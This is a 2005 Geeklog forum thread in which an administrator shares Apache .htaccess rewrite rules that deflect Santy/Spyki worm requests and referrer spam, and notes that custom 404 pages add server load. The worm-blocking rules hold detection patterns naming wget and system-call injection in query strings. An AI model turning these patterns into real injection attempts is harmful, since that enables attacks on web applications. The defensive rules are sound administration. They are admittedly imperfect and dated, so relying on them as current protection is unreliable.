Subject: Blocking unwanted requests to reduce server load

Posted on: 01/01/05 05:21am
By: Dirk

Most tips to speed up a site revolve around optimizing SQL requests or throwing bigger and better hardware at the problem. But if you check your logfiles these days, you'll find a lot of non-sensical requests that can also have some quite dramatic negative impact on your site's performance. Here's a few tips on how to deal with them ...

Santy and other worms

The outbreak of the original Santy worm which only attacked phpBB boards was quickly followed by variants (now called Spyki or PhpInclude worm) that target all PHP scripts out there - including Geeklog.

The Spyki worm tries to exploit a common programming mistake in PHP scripts where the author includes another file based on some parameter passed in the URL. The worm simply tries to exploit this with a brute-force attack on all parameters it can find for a script.

Geeklog itself is not vulnerable to this attack (can't speak for all the existing plugins and other add-ons, but I'm not aware of any problems with them at the moment). But the sheer amount of requests caused by this worm can really slow down a Geeklog site.

So what can we do? The idea is to detect the worm's requests on the server before they're actually executed. I.e. we use the webserver's abilities to catch these requests and make sure the PHP script they're trying to attack is not executed. This safes CPU time (for calling up the PHP interpreter) and DB load (for creating sessions, loading the blocks, etc.).

On geeklog.net, we currently use this in the site's .htaccess file:
# attempts to stop the Santy worm
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
RewriteCond %{HTTP_COOKIE}% sFrown.*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

As explained above, this tries to detect patterns typical to the worm's requests and then redirects them to 127.0.0.1. While it is unlikely that the worm will even follow that redirect, it at least saves our webserver the trouble of having to execute the non-sensical request.

This is not the place to discuss and explain how Apache's mod_rewrite works. Check the Apache manual if you want to learn more about it.

The above rules are derived from similar ones you can find on the web. This site, for example, has similar rules for mod_security (an Apache 2 module) and also discusses some flaws in the above rules (but they seem to work for us for now ...).

Referrer spam

The same approach can also be used against those stupid referal spams. If you check your logfiles, you'll often find requests allegedly coming from porn or mortgage sites. If you look closely, you'll notice that they only send one request for a story or a forum post, but that it doesn't load any images. So it's not someone actually following a link to your site, it's just a stupid bot trying to draw attention to that site.

Again, if those requests come in a lot, they can increase the server load quite a bit. So we use the same idea as for the worms to catch them before the PHP script is even executed:
# Referrer spam :-(
RewriteCond %{HTTP_REFERER} ^http://.*hosting4u.gb.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://.*4free.gb.com.*$ [NC]
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

The two URLs in this example are two from a batch of sites that are being used in referrer spam at the moment. They are probably gone in a few days or weeks and replaced by others.

Which is the main problem with referrer spam: It's a moving target. So most of the time, I'd say don't bother and ignore them. Use the above only if you see a lot of requests and your server's load is increasing because of them.

404s and home-made problems

Some days ago, I was debugging a script and wondering why it caused SQL requests even after it had collected all the data it needed to display the page. The reason was that it was trying to load an image that wasn't there. And because I had set up Apache to use Geeklog's 404.php for the "404 Not Found" error message, it called up that script every time it couldn't find the image.

In case you're not aware, you can set up your own 404 page in a .htaccess like this:
ErrorDocument 404 /404.php

So now every time a file is not found, the error message comes nicely wrapped in Geeklog.

However, that also means that every 404 causes the execution of a PHP script and requests to the database. So if you have a lot of 404s, you're creating a lot of load for both your server and your database. Check your logfiles regularily and try to fix those 404s.

Hope these tips help someone ...

bye, Dirk

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 06:08am
By: destr0yr

[QUOTE BY= Dirk]
Hope these tips help someone ...

bye, Dirk[/QUOTE]
Indeed they will. Thank you Dirk. Happy New Years!

HTTP_REFERER spam

Posted on: 01/01/05 10:01am
By: THEMike

I have a new version of my HTTP_REFERER module for geeklog pending, just ironing out a couple of details. But, it integrates to spamX to detect referer spam and ignore it for logging purposes. Additionaly, I have an alternative config value for spamx action, rather than sending the default one from your config.php it sends it's own configurable value. Added to that I have a custom action for spamx to perform a die(); command when spam is detected and thus stop you wasting a single further CPU cycle on HTTP_REFERER spammers.

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 02:08pm
By: bcbrock

Obviously, the prudent thing to do is implement whatever preventative measures we can to ensure our individual sites are not affected - at least, not affected much. I wonder however, if a GL site that requires user logon to view or post content ( $_CONF['loginrequired'] = 1 ) is somewhat protected from Santy and other like worms???

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 02:26pm
By: Dirk

[QUOTE BY= bcbrock] I wonder however, if a GL site that requires user logon to view or post content ( $_CONF['loginrequired'] = 1 ) is somewhat protected from Santy and other like worms???[/QUOTE]
Depends on what you mean by "protected".

As I said, a Geeklog site can not be infected by this worm. However, since that worm stupidly tries to call each and every PHP script it can find, your site's performance can certainly be affected. Login required or not - calling up the script, doing SQL requests only to display a "you have to be logged in" error message will have a certain impact on the load of your webserver and database.

The method described above tries to ease that load by deflecting the worm's requests.

Anyone remember the Code Red worm that attacked Microsoft's IIS webservers some years ago? It couldn't infect Apache webservers, but still caused server loads and annoying logfile entries there. As with the Santy worm, there's nothing you can do at your end to actually stop those attacks (other than taking down your site ...). All you can do is to try to minimize the impact it has on your site / server.

bye, Dirk

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 11:43pm
By: machinari

[QUOTE BY= Dirk]So now every time a file is not found, the error message comes nicely wrapped in Geeklog.

However, that also means that every 404 causes the execution of a PHP script and requests to the database. So if you have a lot of 404s, you're creating a lot of load for both your server and your database. Check your logfiles regularily and try to fix those 404s.
[/QUOTE]yes yes, 404s were being returned for most of those nasty worm's requests. so scripts were running and the db was taking a hit (cuz i was using gl's 404.php). just now implemented some of the above rewrite rules... looking forward to positive results. thanks Dirk.

Geeklog - Forum
https://www.geeklog.net/forum/viewtopic.php?showtopic=45359